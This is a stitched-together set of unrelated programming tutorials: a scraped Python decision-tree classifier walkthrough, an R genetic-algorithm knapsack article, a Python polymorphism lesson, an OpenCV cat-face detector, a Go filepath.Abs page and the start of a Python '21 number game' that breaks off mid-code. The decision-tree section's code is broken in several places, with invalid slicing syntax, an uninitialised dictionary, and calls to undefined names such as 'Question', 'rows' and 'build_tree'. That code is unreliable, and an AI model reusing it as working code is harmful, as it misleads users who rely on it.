knowledge level, and for that, we are going to write our own simple Decision Tree Classifier from scratch by using Python Programming Language." }, { "code": null, "e": 1648, "s": 1443, "text": "Though i am going to explain everything along the way, it will not be a basic level explanation. I will highlight the important concepts with further links so that everyone can explore more on that topic." }, { "code": null, "e": 1714, "s": 1648, "text": "We are going to use pandas for data processing and data cleaning." }, { "code": null, "e": 1771, "s": 1714, "text": "import pandas as pddf = pd.read_csv('data.csv')df.head()" }, { "code": null, "e": 1891, "s": 1771, "text": "First off, we are importing the data.csv file then processing it as a panda’s data frame and taking a peek at the data." }, { "code": null, "e": 2211, "s": 1891, "text": "As we can see our data has 6 columns. It contains 5 features and 1 label. Since this data is already cleaned, there is no need for data cleaning and wrangling. But while working with other real-world datasets it is important to check for null values and outliers in the dataset and engineer the best features out of it." }, { "code": null, "e": 2257, "s": 2211, "text": "train = df.values[-:20]test = df.values[-20:]" }, { "code": null, "e": 2381, "s": 2257, "text": "here we split our data into train and test where the last 20 data of our dataset are test data and the rest are train data." }, { "code": null, "e": 2434, "s": 2381, "text": "Now it’s time to write our Decision Tree Classifier." }, { "code": null, "e": 2493, "s": 2434, "text": "But before diving into code there are few things to learn:" }, { "code": null, "e": 3359, "s": 2493, "text": "To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. 
You can learn more about them from here.CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error.Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when.To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf." }, { "code": null, "e": 3542, "s": 3359, "text": "To build the tree we are using a Decision Tree learning algorithm called CART. There are other learning algorithms like ID3, C4.5, C5.0, etc. You can learn more about them from here." }, { "code": null, "e": 3767, "s": 3542, "text": "CART stands for Classification and Regression Trees. CART uses Gini impurity as its metric to quantify how much a question helps to unmix the data or in simple words CARD uses Gini as its cost function to evaluate the error." }, { "code": null, "e": 3873, "s": 3767, "text": "Under the hood, all the learning algorithms give us a procedure to decide which question to ask and when." }, { "code": null, "e": 4228, "s": 3873, "text": "To check how correctly the question helped us to unmix the data we use Information Gain. It helps us to reduce the uncertainty and we use this to select the best question to ask and given that question, we recursively build tree nodes. We then further continue dividing the node until there are no questions to ask and we denote that last node as a leaf." }, { "code": null, "e": 4361, "s": 4228, "text": "To implement the Decision Tree Classifier we need to know what question to ask about the data and when. Let's write a code for that:" }, { "code": null, "e": 4677, "s": 4361, "text": "class CreateQuestion: def __init__(self, column, value): self.column = column self.value = value def check(self, data): val = data[self.column] return val >= self.value def __repr__(self): return \"Is %s %s %s?\" % ( self.column[-1], \">=\", str(self.value))" }, { "code": null, "e": 4856, "s": 4677, "text": "Above we’ve written a CreateQuestion class that takes 2 inputs: column number and value as an instance variable. It has a check method which is used to compare the feature value." }, { "code": null, "e": 4929, "s": 4856, "text": "__repr__ is just a python’s magic function to help display the question." }, { "code": null, "e": 4953, "s": 4929, "text": "Let's see it in action:" }, { "code": null, "e": 4981, "s": 4953, "text": "q = CreateQuestion(0, 0.08)" }, { "code": null, "e": 5041, "s": 4981, "text": "now let's check if our check method is working fine or not:" }, { "code": null, "e": 5070, "s": 5041, "text": "data = train[0]q.check(data)" }, { "code": null, "e": 5226, "s": 5070, "text": "as we can see we’ve got a False value. Since our 0th value in the train set is 0.0 which is not greater than or equals to 0.08, our method is working fine." }, { "code": null, "e": 5406, "s": 5226, "text": "Now it’s time to create a partition function that helps us to partition our data into two subsets: The first set contains all the data which is True and the second contains False." 
}, { "code": null, "e": 5435, "s": 5406, "text": "Let's write a code for this:" }, { "code": null, "e": 5655, "s": 5435, "text": "def partition(rows, qsn): true_rows, false_rows = [], [] for row in rows: if qsn.check(row): true_rows.append(row) else: false_rows.append(row) return true_rows, false_rows" }, { "code": null, "e": 5765, "s": 5655, "text": "our partition function takes two inputs: rows and a question then returns a list of true rows and false rows." }, { "code": null, "e": 5799, "s": 5765, "text": "Let's see this in action as well:" }, { "code": null, "e": 5865, "s": 5799, "text": "true_rows, false_rows = partition(train, CreateQuestion(0, 0.08))" }, { "code": null, "e": 5971, "s": 5865, "text": "here true_rows contains all the data grater or equal to 0.08 and false_rows contains data less than 0.08." }, { "code": null, "e": 6202, "s": 5971, "text": "Now it’s time to write our Gini Impurity algorithm. As we’ve discussed earlier, it helps us to quantify how much uncertainty there is in the node, and Information Gain lets us quantify how much a question reduces that uncertainty." }, { "code": null, "e": 6289, "s": 6202, "text": "Impurity metrics range between 0 and 1 where a lower value indicates less uncertainty." }, { "code": null, "e": 6490, "s": 6289, "text": "def gini(rows): counts = class_count(rows) impurity = 1 for label in counts: probab_of_label = counts[label] / float(len(rows)) impurity -= probab_of_label**2 return impurity" }, { "code": null, "e": 6604, "s": 6490, "text": "In our gini function, we have just implemented the formula for Gini. It returns the impurity value of given rows." }, { "code": null, "e": 6801, "s": 6604, "text": "counts variable holds the dictionary with total counts of the given value in the dataset. class_counts is a helper function to count a total number of data present in a dataset of a certain class." }, { "code": null, "e": 6982, "s": 6801, "text": "def class_counts(rows): for row in rows: label = row[-1] if label not in counts: counts[label] = 0 counts[label] += 1 return counts" }, { "code": null, "e": 7008, "s": 6982, "text": "Let's see gini in action:" }, { "code": null, "e": 7131, "s": 7008, "text": "As you can see in image 1 there is some impurity so it returns 0.5 and in image 2 there are no impurities so it returns 0." }, { "code": null, "e": 7196, "s": 7131, "text": "Now we are going to write code for calculating information gain:" }, { "code": null, "e": 7384, "s": 7196, "text": "def info_gain(left, right, current_uncertainty): p = float(len(left)) / (len(left) + len(right)) return current_uncertainty - p * gini(left) \\ - (1 - p) * gini(right)" }, { "code": null, "e": 7505, "s": 7384, "text": "Information gain is calculated by subtracting the uncertainty starting node with a weighted impurity of two child nodes." }, { "code": null, "e": 7547, "s": 7505, "text": "Now it's time to put everything together." 
}, { "code": null, "e": 8208, "s": 7547, "text": "def find_best_split(rows): best_gain = 0 best_question = None current_uncertainty = gini(rows) n_features = len(rows[0]) - 1 for col in range(n_features): values = set([row[col] for row in rows]) for val in values: question = Question(col, val) true_rows, false_rows = partition(rows, question) if len(true_rows) == 0 or len(false_rows) == 0: continue gain = info_gain(true_rows, false_rows,\\ current_uncertainty) if gain > best_gain: best_gain, best_question = gain, question return best_gain, best_question" }, { "code": null, "e": 8362, "s": 8208, "text": "We have written a find_best_split function which finds the best question by iterating over every feature and labels then calculates the information gain." }, { "code": null, "e": 8397, "s": 8362, "text": "Let's see this function in action:" }, { "code": null, "e": 8447, "s": 8397, "text": "best_gain, best_question = find_best_split(train)" }, { "code": null, "e": 8491, "s": 8447, "text": "We are now going to write our fit function." }, { "code": null, "e": 8905, "s": 8491, "text": "def fit(features, labels): data = features + labels gain, question = find_best_split(data) if gain == 0: return Leaf(rows) true_rows, false_rows = partition(rows, question) # Recursively build the true branch. true_branch = build_tree(true_rows) # Recursively build the false branch. false_branch = build_tree(false_rows) return Decision_Node(question, true_branch, false_branch)" }, { "code": null, "e": 9234, "s": 8905, "text": "Our fit function basically builds a tree for us. It starts with the root node and finding the best question to ask for that node by using our find_best_split function. It iterates over each value then splits the data and information gain is calculated. Along the way, it keeps track of the question which produces the most gain." }, { "code": null, "e": 9466, "s": 9234, "text": "After that, if there is still a useful question to ask, the gain will be grater then 0 so rows are sub-grouped into branches and it recursively builds the true branch first until there are no further questions to ask and gain is 0." }, { "code": null, "e": 9502, "s": 9466, "text": "That node then becomes a Leaf node." }, { "code": null, "e": 9543, "s": 9502, "text": "code for our Leaf class looks like this:" }, { "code": null, "e": 9629, "s": 9543, "text": "class Leaf: def __init__(self, rows): self.predictions = class_counts(rows)" }, { "code": null, "e": 9765, "s": 9629, "text": "It holds a dictionary of class(“High”, “Low”) and a number of times it appears in the rows from the data that reached the current leaf." }, { "code": null, "e": 9860, "s": 9765, "text": "for the false branch also the same process is applied. After that, it becomes a Decision_Node." }, { "code": null, "e": 9910, "s": 9860, "text": "Code for our Decision_Node class looks like this:" }, { "code": null, "e": 10117, "s": 9910, "text": "class Decision_Node: def __init__(self, question,\\ true_branch,false_branch): self.question = question self.true_branch = true_branch self.false_branch = false_branch" }, { "code": null, "e": 10210, "s": 10117, "text": "This class just holds the reference of question we’ve asked and two child nodes that result." }, { "code": null, "e": 10390, "s": 10210, "text": "now we return to the root node and build the false branch. Since there will not be any question to ask so, it becomes the Leaf node and the root node also becomes a Decision_Node." 
}, { "code": null, "e": 10424, "s": 10390, "text": "Let's see fit function in action:" }, { "code": null, "e": 10443, "s": 10424, "text": "_tree = fit(train)" }, { "code": null, "e": 10499, "s": 10443, "text": "to print the _tree we have to write a special function." }, { "code": null, "e": 11020, "s": 10499, "text": "def print_tree(node, spacing=\"\"): # Base case: we've reached a leaf if isinstance(node, Leaf): print (spacing + \"Predict\", node.predictions) return # Print the question at this node print (spacing + str(node.question)) # Call this function recursively on the true branch print (spacing + '--> True:') print_tree(node.true_branch, spacing + \" \") # Call this function recursively on the false branch print (spacing + '--> False:') print_tree(node.false_branch, spacing + \" \")" }, { "code": null, "e": 11095, "s": 11020, "text": "this print_tree function helps us to visualize our tree in an awesome way." }, { "code": null, "e": 11156, "s": 11095, "text": "We have just finished building our Decision Tree Classifier!" }, { "code": null, "e": 11235, "s": 11156, "text": "To understand and see what we’ve built let's write some more helper functions:" }, { "code": null, "e": 11458, "s": 11235, "text": "def classify(row, node): if isinstance(node, Leaf): return node.predictions if node.question.check(row): return classify(row, node.true_branch) else: return classify(row, node.false_branch)" }, { "code": null, "e": 11534, "s": 11458, "text": "classify function helps us to check the confidence by given row and a tree." }, { "code": null, "e": 11560, "s": 11534, "text": "classify(train[5], _tree)" }, { "code": null, "e": 11654, "s": 11560, "text": "as you can see above, our tree has classified the given value as a Middle with 96 confidence." }, { "code": null, "e": 11840, "s": 11654, "text": "def print_leaf(counts): total = sum(counts.values()) * 1.0 probs = {} for lbl in counts.keys(): probs[lbl] = str(int(counts[lbl] / total * 100)) + \"%\" return probs" }, { "code": null, "e": 11897, "s": 11840, "text": "print_leaf function helps us to prettify our prediction." }, { "code": null, "e": 11965, "s": 11897, "text": "We have successfully built, visualized, and saw our tree in action." }, { "code": null, "e": 12010, "s": 11965, "text": "Now let's perform a simple model evaluation:" }, { "code": null, "e": 12146, "s": 12010, "text": "for row in testing_data: print (\"Actual level: %s. Predicted level: %s\" % (df['LABEL'], print_leaf(classify(row, _tree))))" }, { "code": null, "e": 12241, "s": 12146, "text": "As you can see our tree nicely predicted our test data which was isolated from the train data." }, { "code": null, "e": 12631, "s": 12241, "text": "Decision Tree Classifier is an awesome algorithm to learn. It is beginner-friendly and is easy to implement as well. We have built a very simple Decision Tree Classifier from scratch without using any abstract libraries to predict the student's knowledge level. By just swapping the dataset and tweaking few functions, you can use this algorithm for another classification purpose as well." }, { "code": null, "e": 12824, "s": 12631, "text": "[1] H. T. Kahraman, Sagiroglu, S., Colak, I., Developing intuitive knowledge classifier and modeling of users’ domain-dependent data in web, Knowledge-Based Systems, vol. 37, pp. 283–295, 2013" } ]
Genetic Algorithm in R: The Knapsack Problem | by Raden Aurelius Andhika Viadinugroho | Towards Data Science
Motivation

The Knapsack Problem is one of the famous problems in optimization, specifically in combinatoric optimization. The motivation of this problem comes from the situation where someone needs to fill his knapsack (hence the name) with the most valuable items possible without exceeding its capacity. There are many approaches to solve this problem, but in this article, I will give you an example to solve this problem using the Genetic Algorithm approach in R.

The Knapsack Problem

In this article, the knapsack problem that we will try to solve is the 0-1 knapsack problem. Given a set of n items numbered from 1 to n, each with a weight w_i and a value v_i, suppose that the number of copies of each item is restricted to 1, i.e. the item is either included in the knapsack or not. Here we want to maximize the objective function (i.e. the values of the items in the knapsack)

\max \sum_{i=1}^{n} v_i x_i

where the objective function is subject to the constraint function

\sum_{i=1}^{n} w_i x_i \leq W, \quad x_i \in \{0, 1\},

with x_i indicating whether item i is included and W denoting the knapsack capacity.

Genetic Algorithm Concepts

Genetic Algorithm is one of the optimization algorithms based on the concept of evolution by natural selection. As proposed by Charles Darwin, evolution by natural selection is the mechanism by which many varieties of living things adapt to the environment to survive, through two principles: natural selection and mutation. Based on that concept, the Genetic Algorithm's goal is to gain the optimal solutions of the objective function by selecting the best or fittest solution alongside rare and random mutation occurrences. The algorithm itself can be explained as follows.

1. Initialize the data and/or the function that we will optimize.
2. Initialize the population size, maximum iteration number (the number of generations), crossover probability, mutation probability, and the number of elitism (the best or fittest individuals that won't undergo mutation).
3. From the population, select two individuals, then perform crossover between the two individuals with probability p.
4. Then, perform mutation between two individuals with probability p (usually the probability of mutation is really low).
5. Repeat steps 3 and 4 until all individuals in one generation are trained. All these individuals will be used for training the next generation, until the number of generations reaches the limit.

To give you a better understanding of the genetic algorithm, let’s jump to the case study where we will use the genetic algorithm to solve the knapsack problem in R.

Case Study: Solving Knapsack Problem using Genetic Algorithm

Suppose that you want to go hiking with your friends, and you have the items that you can use for hiking, with the weight (in kilograms) and survival points of each item, respectively, as follows.

item             weight (kg)   survival points
raincoat              2               5
pocket knife          1               3
mineral water         6              15
gloves                1               5
sleeping bag          4               6
tent                  9              18
portable stove        5               8
canned food           8              20
snacks                3               8

Suppose too that you have a knapsack that can contain items with a maximum capacity of 25 kilograms, where you can only bring one copy of each item.
The goal is: you want to maximize your knapsack capacity while maximizing your survival points as well.

From the problem statement, we can define the weight of the items as the constraint function, while the survival points accumulated from the items in the knapsack form the objective function. For the implementation in this article, here we are using the GA library in R created by Luca Scrucca [2]. First, we need to input the data and the parameters that we use by writing these lines of code.

#0-1 Knapsack's Problem
library(GA)
item=c('raincoat','pocket knife','mineral water','gloves',
       'sleeping bag','tent','portable stove','canned food','snacks')
weight=c(2,1,6,1,4,9,5,8,3)
survival=c(5,3,15,5,6,18,8,20,8)
data=data.frame(item,weight,survival)
max_weight=25

To give you a better understanding of the genetic algorithm in this problem, suppose that we initially only bring a pocket knife, mineral water, and snacks in our knapsack. We can write it as the “chromosome”, and since the problem that we want to solve is a 0-1 knapsack problem, then in the lines of code below, 1 means that we bring the item, while 0 means that we leave the item.

#1 means that we bring the item, while 0 means that we left the item
chromosomes=c(0,1,1,0,0,0,0,0,1)
data[chromosomes==1,]

We can see the result as follows.

> data[chromosomes==1,]
           item weight survival
2  pocket knife      1        3
3 mineral water      6       15
9        snacks      3        8

Then, we create the objective function that we want to optimize, together with the constraint function, by writing the lines of code below. This fitness function is the one we will use in the ga function from the GA library.

#create the function that we want to optimize
fitness=function(x)
{
  current_survpoint=x%*%data$survival
  current_weight=x%*%data$weight
  if(current_weight>max_weight)
  {
    return(0)
  }
  else
  {
    return(current_survpoint)
  }
}

Now here’s the interesting part: the optimization process using the genetic algorithm. Suppose that we want to create a maximum of 30 generations and 50 individuals for the optimization process. For reproducibility, we write the seed argument and keep the best solution.

GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)
summary(GA)
plot(GA)

By running the lines of code above, we can achieve the result as follows.
> GA=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=30,popSize=50,seed=1234,keepBest=TRUE)
GA | iter = 1 | Mean = 31.92 | Best = 61.00
GA | iter = 2 | Mean = 31.32 | Best = 61.00
GA | iter = 3 | Mean = 33.08 | Best = 61.00
GA | iter = 4 | Mean = 36.14 | Best = 61.00
GA | iter = 5 | Mean = 42.42 | Best = 61.00
GA | iter = 6 | Mean = 36.56 | Best = 61.00
GA | iter = 7 | Mean = 37.32 | Best = 61.00
GA | iter = 8 | Mean = 38.18 | Best = 61.00
GA | iter = 9 | Mean = 39.02 | Best = 61.00
GA | iter = 10 | Mean = 38.92 | Best = 61.00
GA | iter = 11 | Mean = 37.54 | Best = 61.00
GA | iter = 12 | Mean = 35.14 | Best = 61.00
GA | iter = 13 | Mean = 36.28 | Best = 61.00
GA | iter = 14 | Mean = 40.82 | Best = 61.00
GA | iter = 15 | Mean = 44.26 | Best = 61.00
GA | iter = 16 | Mean = 41.62 | Best = 61.00
GA | iter = 17 | Mean = 38.66 | Best = 61.00
GA | iter = 18 | Mean = 36.24 | Best = 61.00
GA | iter = 19 | Mean = 43 | Best = 61
GA | iter = 20 | Mean = 43.48 | Best = 61.00
GA | iter = 21 | Mean = 43.08 | Best = 61.00
GA | iter = 22 | Mean = 44.88 | Best = 61.00
GA | iter = 23 | Mean = 46.84 | Best = 61.00
GA | iter = 24 | Mean = 46.8 | Best = 61.0
GA | iter = 25 | Mean = 42.62 | Best = 61.00
GA | iter = 26 | Mean = 46.52 | Best = 61.00
GA | iter = 27 | Mean = 46.14 | Best = 61.00
GA | iter = 28 | Mean = 43.8 | Best = 61.0
GA | iter = 29 | Mean = 46.16 | Best = 61.00
GA | iter = 30 | Mean = 42.6 | Best = 61.0
> summary(GA)
-- Genetic Algorithm -------------------

GA settings:
Type                  = binary
Population size       = 50
Number of generations = 30
Elitism               = 2
Crossover probability = 0.8
Mutation probability  = 0.1

GA results:
Iterations             = 30
Fitness function value = 61
Solution =
     x1 x2 x3 x4 x5 x6 x7 x8 x9
[1,]  1  0  1  1  0  0  1  1  1
> GA@summary
      max  mean q3 median q1 min
[1,]   61 31.92 48   36.0 16   0
[2,]   61 31.32 47   31.0 24   0
[3,]   61 33.08 51   36.5 13   0
[4,]   61 36.14 52   39.0 31   0
[5,]   61 42.42 56   47.5 38   0
[6,]   61 36.56 52   41.5 26   0
[7,]   61 37.32 54   43.0 29   0
[8,]   61 38.18 54   43.0 29   0
[9,]   61 39.02 55   47.0 33   0
[10,]  61 38.92 52   43.5 33   0
[11,]  61 37.54 48   39.0 33   0
[12,]  61 35.14 47   39.0 29   0
[13,]  61 36.28 47   41.0 23   0
[14,]  61 40.82 51   43.0 34   0
[15,]  61 44.26 51   48.0 38  20
[16,]  61 41.62 52   45.0 34   0
[17,]  61 38.66 53   41.5 28   0
[18,]  61 36.24 51   39.5 28   0
[19,]  61 43.00 56   48.0 37   0
[20,]  61 43.48 56   48.0 39   0
[21,]  61 43.08 56   48.0 40   0
[22,]  61 44.88 56   51.0 41   0
[23,]  61 46.84 56   52.0 41   0
[24,]  61 46.80 56   48.0 41   0
[25,]  61 42.62 56   48.0 33   0
[26,]  61 46.52 56   48.0 42   0
[27,]  61 46.14 54   47.0 43   0
[28,]  61 43.80 56   49.5 40   0
[29,]  61 46.16 54   50.0 43   0
[30,]  61 42.60 56   48.0 36   0

From the result above, we can see that the performance of the individuals is increasing in each generation. We can see it from the mean and median of the fitness value (i.e. the survival points in this case), which tend to increase from one generation to the next. Let's try to train it again, but with more generations.

GA2=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=50,popSize=50,seed=1234,keepBest=TRUE)
GA3=ga(type='binary',fitness=fitness,nBits=nrow(data),maxiter=100,popSize=50,seed=1234,keepBest=TRUE)
plot(GA2)
plot(GA3)

From GA2 and GA3, we can see that the optimization result for each individual is at its best around generation 40 and 60, respectively, according to the mean and median of the fitness value in those generations. We can also see that the best fitness value increases to 62 from the 72nd generation onwards. Since we keep the best result of every optimization process, we want to find out the items that we can bring for hiking based on the best result from the genetic algorithm optimization.
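Because the fitted object returned by ga is an S4 object (we already read its @summary slot above), the best chromosome and its fitness can also be pulled out directly. A minimal sketch, using the slot names documented for the GA package:

# the fittest chromosome(s) found and the fitness value they achieve
GA3@solution
GA3@fitnessValue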
We can see the summary of GA3 as follows.

> summary(GA3)
-- Genetic Algorithm -------------------

GA settings:
Type                  = binary
Population size       = 50
Number of generations = 100
Elitism               = 2
Crossover probability = 0.8
Mutation probability  = 0.1

GA results:
Iterations             = 100
Fitness function value = 62
Solution =
     x1 x2 x3 x4 x5 x6 x7 x8 x9
[1,]  1  1  1  1  1  0  0  1  1

From the result above, we can conclude that the items to include in the knapsack are the raincoat, pocket knife, mineral water, gloves, sleeping bag, canned food, and snacks. We can calculate the weight of the knapsack to make sure that it is not over capacity.

> chromosomes_final=c(1,1,1,1,1,0,0,1,1)
> cat(chromosomes_final%*%data$weight)
25

Great! We can see that the total weight of the items is exactly the knapsack capacity!

Conclusion

And there you go! You can go hiking with your friends (best done after the pandemic is over, of course) with maximum survival points and a full knapsack by implementing the genetic algorithm in R. In fact, you can solve the knapsack problem with a genetic algorithm in many real-world applications, such as choosing the best-performing portfolio, production scheduling, and many more.

As usual, feel free to contact me via my LinkedIn if you have any questions or want to discuss anything. Stay safe and stay healthy!

References

[1] G. B. Matthews, On the Partition of Numbers (1897), Proceedings of the London Mathematical Society.
[2] Luca Scrucca, GA: A Package for Genetic Algorithms in R (2013), Journal of Statistical Software.
[3] https://www.rdocumentation.org/packages/GA/versions/3.2/topics/ga
[4] Harvey M. Salkin and Cornelis A. De Kluyver, The knapsack problem: A survey (1975), Naval Research Logistics Quarterly.
[5] Krzysztof Dudziński and Stanisław Walukiewicz, Exact methods for the knapsack problem and its generalizations (1987), European Journal of Operational Research.
[6] Sami Khuri, Thomas Bäck, and Jörg Heitkötter, The zero/one multiple knapsack problem and genetic algorithms (1994), SAC '94: Proceedings of the 1994 ACM Symposium on Applied Computing.
Polymorphism in Python
Polymorphism means multiple forms. In Python we can find the same operator or function taking multiple forms. It is also useful for creating different classes that have class methods with the same name, which helps in reusing a lot of code and decreases code complexity. Polymorphism is also linked to inheritance, as we will see in some examples below.

The + operator can take two inputs and give us a result depending on what the inputs are. In the examples below we can see how integer inputs yield an integer, and how, if one of the inputs is a float, the result becomes a float. Strings simply get concatenated. This happens automatically because of the way the + operator is implemented in Python.

a = 23
b = 11
c = 9.5
s1 = "Hello"
s2 = "There!"
print(a + b)
print(type(a + b))
print(b + c)
print(type(b + c))
print(s1 + s2)
print(type(s1 + s2))

Running the above code gives us the following result −

34
<class 'int'>
20.5
<class 'float'>
HelloThere!
<class 'str'>

We can also see that different Python functions can take inputs of different types and then process them differently. When we supply a string value to len(), it counts every character in it. But if we give it a tuple or a dictionary as input, it processes them differently.

str = 'Hi There !'
tup = ('Mon','Tue','wed','Thu','Fri')
lst = ['Jan','Feb','Mar','Apr']
dict = {'1D':'Line','2D':'Triangle','3D':'Sphere'}
print(len(str))
print(len(tup))
print(len(lst))
print(len(dict))

Running the above code gives us the following result −

10
5
4
3

We can also create methods with the same name wrapped under different class names, and keep calling the same method with a different class instance to get different results. In the example below we have two classes, Rectangle and Circle, that compute their perimeter and area using methods with the same names.

from math import pi

class Rectangle:
   def __init__(self, length, breadth):
      self.l = length
      self.b = breadth
   def perimeter(self):
      return 2*(self.l + self.b)
   def area(self):
      return self.l * self.b

class Circle:
   def __init__(self, radius):
      self.r = radius
   def perimeter(self):
      return 2 * pi * self.r
   def area(self):
      return pi * self.r ** 2

# Initialize the classes
rec = Rectangle(5,3)
cr = Circle(4)
print("Perimeter of rectangle: ",rec.perimeter())
print("Area of rectangle: ",rec.area())

print("Perimeter of Circle: ",cr.perimeter())
print("Area of Circle: ",cr.area())

Running the above code gives us the following result −

Perimeter of rectangle:  16
Area of rectangle:  15
Perimeter of Circle:  25.132741228718345
Area of Circle:  50.26548245743669

As noted at the start, polymorphism is also linked to inheritance; the sketch below illustrates this through method overriding.
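The following is a minimal sketch (not part of the original examples; the class names are illustrative) in which a child class overrides a parent method, so the same call behaves differently depending on the object's actual class:

class Bird:
   def intro(self):
      print("There are many types of birds.")
   def flight(self):
      print("Most birds can fly.")

class Ostrich(Bird):
   # overriding the inherited method changes the
   # behaviour for Ostrich objects only
   def flight(self):
      print("Ostriches cannot fly.")

for bird in (Bird(), Ostrich()):
   bird.intro()   # inherited behaviour, same for both classes
   bird.flight()  # resolved at runtime to the object's own class

Running the above code gives us the following result −

There are many types of birds.
Most birds can fly.
There are many types of birds.
Ostriches cannot fly.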
Detect Cat Faces in Real-Time using Python-OpenCV - GeeksforGeeks
03 Jul, 2020

Face Detection is a technology to identify faces in an image; we use Python's OpenCV library for this. Face detection can be applied to animals too. If one takes a close look at the OpenCV repository — the haar cascades directory to be specific, where OpenCV stores all its pre-trained haar classifiers for detecting various objects, body parts, etc. — there are two files for cat faces:

haarcascade_frontalcatface.xml
haarcascade_frontalcatface_extended.xml

The objective of the program given here is to detect the object of interest (a cat face) in real time and to keep tracking that object. This is a simple example of how to detect a cat face in Python. You can try detecting any other object of your choice by using a classifier trained on that object.

Below is the implementation.

# OpenCV program to detect cat face in real time

# import library of python OpenCV
# where its functionality resides
import cv2

# load the required trained XML classifier
# https://github.com/Itseez/opencv/blob/master/
# data/haarcascades/haarcascade_frontalcatface.xml
# Trained XML classifiers describe features of the object
# we want to detect; a cascade function is trained from
# a lot of positive (faces) and negative (non-faces) images.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalcatface.xml')

# capture frames from a camera
cap = cv2.VideoCapture(0)

# loop runs if capturing has been initialized
while 1:

    # read frames from the camera
    ret, img = cap.read()

    # convert each frame to gray scale
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    # detect faces of different sizes in the input image
    faces = face_cascade.detectMultiScale(gray, 1.3, 5)

    for (x, y, w, h) in faces:
        # draw a rectangle around the face
        cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 2)
        roi_gray = gray[y:y + h, x:x + w]
        roi_color = img[y:y + h, x:x + w]

    # display the image in a window
    cv2.imshow('img', img)

    # wait for Esc key to stop
    k = cv2.waitKey(30) & 0xff
    if k == 27:
        break

# close the window
cap.release()

# de-allocate any associated memory usage
cv2.destroyAllWindows()

Output: a window displaying the live camera feed with a rectangle drawn around each detected cat face.
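The same cascade approach also works on a still image instead of a webcam stream. The snippet below is an illustrative sketch (cat.jpg is a placeholder file name) that uses the second, extended cascade file mentioned above:

import cv2

# the "extended" cascade covers a wider range of cat-face poses
cascade = cv2.CascadeClassifier('haarcascade_frontalcatface_extended.xml')

# read an input image and convert it to gray scale
img = cv2.imread('cat.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

# a smaller scale step and lower neighbour count are common
# starting points for still images; tune both for your own data
faces = cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)

# draw a rectangle around every detection and save the result
for (x, y, w, h) in faces:
    cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 2)

cv2.imwrite('cat_detected.jpg', img)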
filepath.Abs() Function in Golang With Examples - GeeksforGeeks
10 May, 2020

In the Go language, the path package is used for paths separated by forward slashes, such as the paths in URLs. The filepath.Abs() function in Go is used to return an absolute representation of the specified path. If the path is not absolute, it is joined with the current working directory to turn it into an absolute path. This function is defined under the path/filepath package, so you need to import "path/filepath" in order to use it.

Syntax:

func Abs(path string) (string, error)

Here, 'path' is the specified path.

Return Value: It returns an absolute representation of the specified path.

Example 1:

// Golang program to illustrate the usage of
// filepath.Abs() function

// Including the main package
package main

// Importing fmt and path/filepath
import (
    "fmt"
    "path/filepath"
)

// Calling main
func main() {

    // Calling the Abs() function to get the
    // absolute representation of the specified path
    fmt.Println(filepath.Abs("/home/gfg"))
    fmt.Println(filepath.Abs(".gfg"))
    fmt.Println(filepath.Abs("/gfg"))
    fmt.Println(filepath.Abs(":gfg"))
}

Output (with the working directory at the filesystem root):

/home/gfg <nil>
/.gfg <nil>
/gfg <nil>
/:gfg <nil>

Example 2:

// Golang program to illustrate the usage of
// filepath.Abs() function

// Including the main package
package main

// Importing fmt and path/filepath
import (
    "fmt"
    "path/filepath"
)

// Calling main
func main() {

    // Calling the Abs() function to get the
    // absolute representation of the specified path
    fmt.Println(filepath.Abs("/"))
    fmt.Println(filepath.Abs("."))
    fmt.Println(filepath.Abs(":"))
    fmt.Println(filepath.Abs("/."))
    fmt.Println(filepath.Abs("//"))
    fmt.Println(filepath.Abs(":/"))
}

Output (with the working directory at the filesystem root):

/ <nil>
/ <nil>
/: <nil>
/ <nil>
/ <nil>
/: <nil>
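Since Abs also returns an error (for example, when the current working directory cannot be determined), idiomatic code checks the error instead of printing both return values. Below is a minimal sketch, using an illustrative relative path:

// Resolving a relative path with explicit error handling
package main

import (
    "fmt"
    "log"
    "path/filepath"
)

func main() {

    // Abs resolves relative paths against the current working
    // directory, so the result depends on where the program runs
    abs, err := filepath.Abs("data/config.yaml")
    if err != nil {
        log.Fatal(err)
    }
    fmt.Println("absolute path:", abs)
}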
21 Number game in Python - GeeksforGeeks
31 Jan, 2022

21, Bagram, or Twenty-plus-one is a game which progresses by counting up from 1 to 21, with the player who calls "21" being eliminated. It can be played between any number of players.

Implementation

This is a simple 21 number game using the Python programming language. The game illustrated here is between the player and the computer. There can be many variations of the game.

The player can choose to start first or second.

The list of numbers called so far is shown before the player takes his turn, for convenience.

If consecutive numbers are not given as input, the player is automatically disqualified.

The player loses if he gets the chance to call 21 and wins otherwise.

Winning against the computer is possible by choosing to play second. The strategy is to always finish your turn on a multiple of 4, which eventually forces the computer to reach 21 and hence makes the player the winner.

# Python code to play 21 Number game

# returns the nearest multiple of 4
def nearestMultiple(num):
    if num >= 4:
        near = num + (4 - (num % 4))
    else:
        near = 4
    return near

def lose1():
    print("\n\nYOU LOSE !")
    print("Better luck next time !")
    exit(0)

# checks whether the numbers are consecutive
def check(xyz):
    i = 1
    while i < len(xyz):
        if (xyz[i] - xyz[i - 1]) != 1:
            return False
        i = i + 1
    return True

# starts the game
def start1():
    xyz = []
    last = 0
    while True:
        print("Enter 'F' to take the first chance.")
        print("Enter 'S' to take the second chance.")
        chance = input('> ')

        # player takes the first chance
        if chance == "F":
            while True:
                if last == 20:
                    lose1()
                else:
                    print("\nYour Turn.")
                    print("\nHow many numbers do you wish to enter?")
                    inp = int(input('> '))
                    if inp > 0 and inp <= 3:
                        comp = 4 - inp
                    else:
                        print("Wrong input. You are disqualified from the game.")
